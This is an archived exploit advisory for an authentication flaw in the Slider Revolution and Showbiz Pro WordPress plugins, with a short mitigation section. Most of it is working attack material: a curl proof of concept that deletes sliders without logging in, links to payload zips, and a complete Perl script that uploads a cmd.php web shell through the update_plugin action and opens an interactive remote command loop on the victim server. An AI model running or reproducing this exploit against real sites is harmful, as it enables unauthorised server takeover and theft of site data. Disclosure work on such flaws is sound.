Slider Revolution/Showbiz Pro shell upload exploit

2014-12-01T00:00:00
ID SECURITYVULNS:DOC:31419
Type securityvulns
Reporter Securityvulns
Modified 2014-12-01T00:00:00

Description

!/usr/bin/perl

Title: Slider Revolution/Showbiz Pro shell upload exploit

Author: Simo Ben youssef

Contact: Simo_at_Morxploit_com

Discovered: 15 October 2014

Coded: 15 October 2014

Updated: 25 November 2014

Published: 25 November 2014

MorXploit Research

http://www.MorXploit.com

Vendor: ThemePunch

Vendor url: http://themepunch.com

Software: Revslider/Showbiz Pro

Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)

Products url:

http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988

Vulnerable scripts:

revslider/revslider_admin.php

showbiz/showbiz_admin.php

About the plugins:

The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any

kind of content whith highly customizable, transitions, effects and custom animations.

Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set

amount of teaser items.

Description:

Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated

attacker to abuse administrative features.

Some of the features include:

Creating/Deleting/Updating sliders

Importing/exporting sliders

Updading plugin

For a full list of functions please see revslider_admin.php/showbiz_admin.php

PoC on revslider:

1- Deleting a slider:

root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"

http://****.com/wp-admin/admin-ajax.php

* Connected to *.com (*...) port 80 (#0)

> POST /wp-admin/admin-ajax.php HTTP/1.1

> User-Agent: curl/7.35.0

> Host: ****.com

> Accept: /

> Content-Length: 73

> Content-Type: application/x-www-form-urlencoded

>

* upload completely sent off: 73 out of 73 bytes

< HTTP/1.1 200 OK

< Date: Fri, 24 Oct 2014 23:25:07 GMT

* Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted

< Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

< X-Powered-By: PHP/5.4.18

< X-Robots-Tag: noindex

< X-Content-Type-Options: nosniff

< Expires: Wed, 11 Jan 1984 05:00:00 GMT

< Cache-Control: no-cache, must-revalidate, max-age=0

< Pragma: no-cache

< X-Frame-Options: SAMEORIGIN

< Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/

< Transfer-Encoding: chunked

< Content-Type: text/html; charset=UTF-8

<

* Connection #0 to host http://****.com left intact

{"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}

2- Uploading an web shell:

The following perl exploit will try to upload an HTTP php shell through the the update_plugin function

To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php

http://www.morxploit.com/morxploits/revslider.zip

http://www.morxploit.com/morxploits/showbiz.zip

and save them it in the same directory where you have the exploit.

Demo:

perl morxrev.pl http://localhost revslider

===================================================

--- Revslider/Showbiz shell upload exploit

--- By: Simo Ben youssef <simo_at_morxploit_com>

--- MorXploit Research www.MorXploit.com

===================================================

[*] Target set to revslider

[*] MorXploiting http://localhost

[*] Sent payload

[+] Payload successfully executed

[*] Checking if shell was uploaded

[+] Shell successfully uploaded

Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@MorXploit:~$

Download:

Exploit:

http://www.morxploit.com/morxploits/morxrevbiz.pl

Exploit update zip files:

http://www.morxploit.com/morxploits/revslider.zip

http://www.morxploit.com/morxploits/showbiz.zip

Requires LWP::UserAgent

apt-get install libwww-perl

yum install libwww-perl

perl -MCPAN -e 'install Bundle::LWP'

For SSL support:

apt-get install liblwp-protocol-https-perl

yum install perl-Crypt-SSLeay

Mitigation:

Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have

decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the

latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an

auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get

plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the

auto-update feature on, otherwise ... you are screwed.

Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system

as well as the ability to dump the entire wordpress database locally.

That being said, upgrade immediately to the latest version or disable/switch to another plugin.

As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).

Author disclaimer:

The information contained in this entire document is for educational, demonstration and testing purposes only.

Author cannot be held responsible for any malicious use or damage. Use at your own risk.

Got comments or questions?

Simo_at_MorXploit_dot_com

Did you like this exploit?

Feel free to buy me a beer =)

My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u

Cheers!

use LWP::UserAgent; use MIME::Base64; use strict;

sub banner { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "===================================================\n"; print "--- Revslider/Showbiz shell upload exploit\n"; print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n"; print "--- MorXploit Research www.MorXploit.com\n"; print "===================================================\n"; }

if (!defined ($ARGV[0] && $ARGV[1])) { banner(); print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; print "perl $0 http://localhost showbiz\n"; exit; }

my $zip1 = "revslider.zip"; my $zip2 = "showbiz.zip";

unless (-e ($zip1 && $zip2)) { banner(); print "[-] $zip1 or $zip2 not found! RTFM\n"; exit; }

my $host = $ARGV[0]; my $plugin = $ARGV[1]; my $action; my $update_file;

if ($plugin eq "revslider") { $action = "revslider_ajax_action"; $update_file = "$zip1"; } elsif ($plugin eq "showbiz") { $action = "showbiz_ajax_action"; $update_file = "$zip2"; } else { banner(); print "[-] Wrong plugin name\n"; print "perl $0 <target> <plugin>\n"; print "perl $0 http://localhost revslider\n"; print "perl $0 http://localhost showbiz\n"; exit; } my $target = "wp-admin/admin-ajax.php"; my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";

sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' ); my $random = $array[rand @array]; return($random); } my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $ua->timeout(10); $ua->agent($useragent); my $status = $ua->get("$host/$target"); unless ($status->is_success) { banner(); print "[-] Xploit failed: " . $status->status_line . "\n"; exit; }

banner(); print "[] Target set to $plugin\n"; print "[] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) { print "[+] Payload successfully executed\n"; }

elsif ($exploit->decoded_content =~ /Wrong request/) { print "[-] Payload failed: Not vulnerable\n"; exit; }

elsif ($exploit->decoded_content =~ m/0$/) { print "[-] Payload failed: Plugin unavailable\n"; exit; }

else { $exploit->decoded_content =~ /<\/b>(.*?)<br>/; print "[-] Payload failed:$1\n"; print "[-] " . $exploit->decoded_content unless (defined $1); print "\n"; exit; }

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @[ map{ rand @ } 1 .. shift ] } my $rndstr = rndstr(8, 1..9, 'a'..'z'); my $cmd1 = encode_base64("echo $rndstr"); my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) { print "[-] Xploit failed: system() has been disabled\n"; exit; }

elsif ($status->decoded_content !~ /$rndstr/) { print "[-] Xploit failed: " . $status->status_line . "\n"; exit; }

elsif ($status->decoded_content =~ /$rndstr/) { print "[+] Shell successfully uploaded\n"; } my $cmd2 = encode_base64("whoami"); my $whoami = $ua->get("$host/$shell?cmd=$cmd2"); my $cmd3 = encode_base64("uname -n"); my $uname = $ua->get("$host/$shell?cmd=$cmd3"); my $cmd4 = encode_base64("id"); my $id = $ua->get("$host/$shell?cmd=$cmd4"); my $cmd5 = encode_base64("uname -a"); my $unamea = $ua->get("$host/$shell?cmd=$cmd5"); print $unamea->decoded_content; print $id->decoded_content; my $wa = $whoami->decoded_content; my $un = $uname->decoded_content; chomp($wa); chomp($un);

while () { print "\n$wa\@$un:~\$ "; chomp(my $cmd=<STDIN>); if ($cmd eq "exit") { print "Aurevoir!\n"; exit; } my $ucmd = encode_base64("$cmd"); my $output = $ua->get("$host/$shell?cmd=$ucmd"); print $output->decoded_content; }